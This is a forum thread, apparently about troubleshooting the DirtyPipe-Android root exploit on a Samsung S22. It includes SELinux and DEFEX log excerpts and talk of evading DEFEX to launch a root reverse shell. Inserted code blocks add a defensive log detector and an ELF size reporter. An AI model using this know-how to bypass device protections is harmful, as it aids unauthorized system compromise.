-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4797
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4888]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4964]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4967]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [49871
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5001]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5052]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5170]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5398]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5421]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5462]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5563]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5759]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5919]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6288]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6353]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6460]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6464]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6554]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6564]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6587]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [6619]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [6905]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7191]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7403]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7751
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [8293]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [8319]:

I built mymod.ko with the S22 kernel. It's too large

du -sh mymod.ko
432K

What are all these things?

|b0q:/ $ cd /data/local/tmp
b0q:/data/local/tmp $ ls -al

I have never seen that... It seems to be the result of pasting some log output into adb shell. Or a bug in run.bat?

I built mymod.ko with the S22 kernel. It's too large

du -sh mymod.ko 432K

That is the output before stripping debug info. Check the ./out/(devicename)/dist/mymod.ko file instead.

I think I'm confused about when startup-root is run and by what. I ask because it doesn't seem to run at all: I added a line to echo hello to a file in /data/local/tmp and no file is made. I also removed all code from it and nothing seems to change at all.

startup-root is launched here
The modprobe process is running as root and SELinux is already permissive after the line syscall(__NR_finit_module, ...).
So startup-root should run in a root+permissive environment. There is no problem on Pixel 6.

I think DEFEX prevents startup-root from launching.

Ok, I wasn't sure if the issue was due to running it from /data/local/tmp

The beta4 here: is the source on the page the same as that, or is it different?

beta4 gives permissive, however compiled from source does not; not sure if the source is different or there are issues in compiling.

I also get this when compiling:
make: Circular mymod.ko <- mymod.ko dependency dropped.

I built mymod.ko with the S22 kernel. It's too large
du -sh mymod.ko 432K

That is the output before stripping debug info. Check the ./out/(devicename)/dist/mymod.ko file instead.

file in ./out/(devicename)/dist/mymod.ko is 92k ...

I didn't build mymod.ko, I use the one that's in the source

I didn't build mymod.ko, I use the one that's in the source

I think he's asking his own question, as he compiled it but it was too large apparently, so his is different than yours

startup-root is launched here. The modprobe process is running as root and SELinux is already permissive after the line syscall(__NR_finit_module, ...). So startup-root should run in a root+permissive environment. There is no problem on Pixel 6.

I think DEFEX prevents startup-root from launching.

Wouldn't we see DEFEX in the logs though? Pretty sure in the past it would log any violations blocked by DEFEX, similar to selinux denials..

Also, if it was being blocked wouldn't it still be able to launch a normal uid reverse shell without root privs?

And the ls -al I showed earlier is what I find in data/local/tmp after running run.bat (and even switched to linux and ran run.sh) when it says it worked but fails to launch a reverse shell.. might be the reverse-fifo?

startup-root is launched here. The modprobe process is running as root and SELinux is already permissive after the line syscall(__NR_finit_module, ...). So startup-root should run in a root+permissive environment. There is no problem on Pixel 6.

I think DEFEX prevents startup-root from launching.

This isnt from my device but here is an example of what it would look like in logs if defex was blocking something:

[ 21.151486] defex: safeplace violation [task=init (/init), child=/root/cbd, uid=0]

Could it be that vendor_modprobe doesn't have the capability of launching data_shell_file in the data/local/tmp dir?

ayload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:265): avc: denied { search } for pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:266): avc: denied { execute } for pid=5658 comm="modprobe" name="startup-root"dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:267): avc: denied { read open } for pid=5658 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered

-29 07:47:12.947 5656 5656 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:265): avc: denied { search } for pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:266): avc: denied { execute } for pid=5658 comm="modprobe" name="startup-root"dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:267): avc: denied { read open } for pid=5658 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered

[ 41.812778] [ T9901] defex: safeplace violation [task=modprobe (/vendor/bin/toolbox), child=/data/local/tmp/startup-root, uid=0]

[ 41.812778] [ T9901] defex: safeplace violation [task=modprobe (/vendor/bin/toolbox), child=/data/local/tmp/startup-root, uid=0]

Ahh.. there you go then lol, we need to somehow use another dir other than data/local/tmp that isn't a safeplace
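From the defender's side, the two log signals traded back and forth in this thread (SELinux denials stamped `permissive=1` while a vendor domain executes a `shell_data_file`, and the DEFEX `safeplace violation` line) are exactly what an on-device or fleet log monitor should alert on. The following Python detector is an added example, not code from this thread or from the DirtyPipe-Android project. The sample lines are constructed, modelled on the logcat and dmesg excerpts above; the `WRITABLE_TYPES` and `UNPRIVILEGED_DOMAINS` sets are assumptions chosen for illustration and would be tuned per device policy.

```python
import re
from collections import Counter

# SELinux denial as printed by logcat ("E audit : type=1400 ... avc: denied ...") or by dmesg.
AVC_RE = re.compile(
    r'avc:\s+denied\s+\{\s*(?P<perms>[^}]+?)\s*\}\s+for\s+pid=(?P<pid>\d+)\s+comm="(?P<comm>[^"]+)"'
    r'(?:\s+name="(?P<name>[^"]+)")?(?:\s+path="(?P<path>[^"]+)")?'
    r'.*?scontext=(?P<scontext>\S+)\s+tcontext=(?P<tcontext>\S+)\s+tclass=(?P<tclass>\S+)'
    r'(?:\s+permissive=(?P<permissive>[01]))?')

# Samsung DEFEX message as it appears in dmesg.
DEFEX_RE = re.compile(
    r'defex:\s+(?P<kind>\w+)\s+violation\s+\[task=(?P<task>\S+)\s+\((?P<exe>[^)]+)\),'
    r'\s*child=(?P<child>[^,\]]+),\s*uid=(?P<uid>\d+)\]')

# Assumed sets for illustration: file labels an unprivileged shell/app can write to,
# and the domains that legitimately touch them. A privileged domain executing such a
# file is the pattern a rooting payload produces.
WRITABLE_TYPES = {'shell_data_file', 'app_data_file'}
UNPRIVILEGED_DOMAINS = {'shell', 'untrusted_app', 'adbd'}


def context_type(ctx):
    """'u:r:vendor_modprobe:s0' -> 'vendor_modprobe'; 'u:object_r:shell_data_file:s0' -> 'shell_data_file'."""
    parts = ctx.split(':')
    return parts[2] if len(parts) >= 3 else ctx


def analyze(log_text):
    """Scan mixed logcat/dmesg text and return a list of findings (dicts with a 'rule' key)."""
    findings = []
    for line in log_text.splitlines():
        m = AVC_RE.search(line)
        if m:
            perms = m.group('perms').split()
            domain = context_type(m.group('scontext'))
            target_type = context_type(m.group('tcontext'))
            base = {'pid': int(m.group('pid')), 'comm': m.group('comm'), 'domain': domain,
                    'target': m.group('path') or m.group('name') or ''}
            # permissive=1 means the denial was logged but not enforced. A user build
            # should have no permissive domains, so this alone is worth an alert.
            if m.group('permissive') == '1':
                findings.append({'rule': 'permissive-domain', **base})
            if 'execute' in perms and target_type in WRITABLE_TYPES and domain not in UNPRIVILEGED_DOMAINS:
                findings.append({'rule': 'privileged-exec-from-writable', **base})
            continue
        m = DEFEX_RE.search(line)
        if m:
            findings.append({'rule': 'defex-' + m.group('kind'), 'task': m.group('task'),
                             'exe': m.group('exe'), 'child': m.group('child'),
                             'uid': int(m.group('uid'))})
    return findings


def summarize(findings):
    """Count findings per rule, e.g. {'permissive-domain': 3, ...}."""
    return dict(Counter(f['rule'] for f in findings))


# Constructed sample, modelled on the logcat and dmesg excerpts in this thread.
SAMPLE_LOG = """\
03-29 09:01:47.097 16957 16957 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:246): avc:  denied  { search } for  pid=16958 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:247): avc:  denied  { execute } for  pid=16958 comm="modprobe" name="startup-root" dev="dm-14" ino=24217 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:248): avc:  denied  { read open } for  pid=16958 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=24217 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:48.001  1194  1194 E audit   : type=1400 audit(1648569708.000:249): avc:  denied  { read } for  pid=4242 comm="someapp" name="foo" dev="dm-14" ino=99 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:system_data_file:s0 tclass=file permissive=0
[   41.812778] [ T9901] defex: safeplace violation [task=modprobe (/vendor/bin/toolbox), child=/data/local/tmp/startup-root, uid=0]
"""

if __name__ == '__main__':
    found = analyze(SAMPLE_LOG)
    for f in found:
        print(f)
    print(summarize(found))
```

On the sample above the detector reports three `permissive-domain` hits, one `privileged-exec-from-writable` hit (vendor_modprobe executing startup-root) and one `defex-safeplace` hit, while the ordinary enforced denial from `untrusted_app` is ignored. Feeding it `adb logcat -d` plus `dmesg` output gives a quick triage of whether a device shows this pattern.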

startup-root is launched here. The modprobe process is running as root and SELinux is already permissive after the line syscall(__NR_finit_module, ...). So startup-root should run in a root+permissive environment. There is no problem on Pixel 6.

I think DEFEX prevents startup-root from launching.

Something like this might work no?

https://github.com/vngkv123/articles/blob/main/Galaxy's%20Meltdown%20-%20Exploiting%20SVE-2020-18610.md#:~:text=DEFEX%20Bypass&text=As%20similar%20to%20the%20way,via%20arbitrary%20kernel%20write%20primitive.

I built mymod.ko with the S22 kernel. It's too large
du -sh mymod.ko 432K

That is the output before stripping debug info. Check the ./out/(devicename)/dist/mymod.ko file instead.

file in ./out/(devicename)/dist/mymod.ko is 92k ...

Which section takes the capacity? Compare with the one on repository.
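The question of which section accounts for a module's size is answered by `readelf -S --wide file.ko`, or by the small section-size report below. It is an added example, not code from this thread or from the DirtyPipe-Android project: it parses the ELF64 section header table directly so it runs anywhere Python does, and builds a constructed image with an unstripped-module shape (large `.debug_info`/`.debug_str` sections) to demonstrate the output. The section names and sizes in `build_sample_module` are made up for illustration; for a real file call `size_report(open(path, 'rb').read())`.

```python
import struct
from collections import namedtuple

# Struct layouts for little-endian ELF64 (what an arm64 .ko is).
ELF64_EHDR = struct.Struct('<16sHHIQQQIHHHHHH')  # 64-byte file header
ELF64_SHDR = struct.Struct('<IIQQQQIIQQ')        # 64-byte section header
SHT_NULL, SHT_PROGBITS, SHT_STRTAB, SHT_NOBITS = 0, 1, 3, 8

Section = namedtuple('Section', 'name type size')


def parse_sections(data):
    """Return the named sections of a little-endian ELF64 image as Section tuples."""
    if data[:4] != b'\x7fELF' or data[4] != 2 or data[5] != 1:
        raise ValueError('not a little-endian ELF64 file')
    hdr = ELF64_EHDR.unpack_from(data, 0)
    shoff, shentsize, shnum, shstrndx = hdr[6], hdr[11], hdr[12], hdr[13]
    if shentsize != ELF64_SHDR.size:
        raise ValueError('unexpected section header entry size')
    headers = [ELF64_SHDR.unpack_from(data, shoff + i * shentsize) for i in range(shnum)]
    # Section names are offsets into the string table section selected by e_shstrndx.
    str_off, str_size = headers[shstrndx][4], headers[shstrndx][5]
    strtab = data[str_off:str_off + str_size]
    sections = []
    for sh_name, sh_type, _flags, _addr, _off, sh_size, *_rest in headers:
        if sh_type == SHT_NULL:
            continue
        end = strtab.index(b'\0', sh_name)
        sections.append(Section(strtab[sh_name:end].decode(), sh_type, sh_size))
    return sections


def size_report(data):
    """(name, file bytes) pairs, largest first. NOBITS sections (.bss) occupy no file space."""
    rows = [(s.name, 0 if s.type == SHT_NOBITS else s.size) for s in parse_sections(data)]
    return sorted(rows, key=lambda row: -row[1])


def debug_share(data):
    """Fraction of file-resident section bytes held by .debug_* sections."""
    rows = size_report(data)
    total = sum(size for _, size in rows)
    debug = sum(size for name, size in rows if name.startswith('.debug_'))
    return debug / total if total else 0.0


def build_sample_module(with_debug=True):
    """Constructed ELF64 relocatable image shaped like an unstripped kernel module.
    Section contents are zero filler; only the headers matter for the size report."""
    sizes = {'.text': 40_000, '.data': 6_000, '.bss': 2_000,
             '.debug_info': 300_000, '.debug_str': 50_000}
    names = ['', '.text', '.data', '.bss', '.shstrtab']
    if with_debug:
        names += ['.debug_info', '.debug_str']
    strtab, name_off = b'', {}
    for n in names:
        name_off[n] = len(strtab)
        strtab += n.encode() + b'\0'
    body = bytearray(ELF64_EHDR.size)        # file header is filled in at the end
    shstr_off = len(body)
    body += strtab
    offsets = {}
    for n in names:
        if n in ('', '.shstrtab'):
            continue
        offsets[n] = len(body)
        if n != '.bss':                      # .bss has no file contents
            body += bytes(sizes[n])
    shoff = len(body)
    for n in names:
        if n == '':
            body += ELF64_SHDR.pack(0, SHT_NULL, 0, 0, 0, 0, 0, 0, 0, 0)
        elif n == '.shstrtab':
            body += ELF64_SHDR.pack(name_off[n], SHT_STRTAB, 0, 0, shstr_off, len(strtab), 0, 0, 1, 0)
        else:
            stype = SHT_NOBITS if n == '.bss' else SHT_PROGBITS
            body += ELF64_SHDR.pack(name_off[n], stype, 0, 0, offsets[n], sizes[n], 0, 0, 1, 0)
    ident = b'\x7fELF' + bytes([2, 1, 1, 0]) + bytes(8)   # ELF64, little-endian, version 1
    ELF64_EHDR.pack_into(body, 0, ident, 1, 0xB7, 1, 0, 0, shoff, 0,   # ET_REL, EM_AARCH64
                         ELF64_EHDR.size, 0, 0, ELF64_SHDR.size, len(names), names.index('.shstrtab'))
    return bytes(body)


if __name__ == '__main__':
    image = build_sample_module()
    for name, size in size_report(image):
        print(f'{name:14s} {size:>8d}')
    print(f'debug share: {debug_share(image):.0%}')
```

On the constructed image the `.debug_*` sections hold close to 90% of the file bytes, which is the situation polygraphene describes: the unstripped build output is several times the size of the stripped module in `dist/`. Comparing the report for a locally built module with the one for the module shipped in the repository shows at a glance whether the difference is debug info or something in `.text`/`.data`.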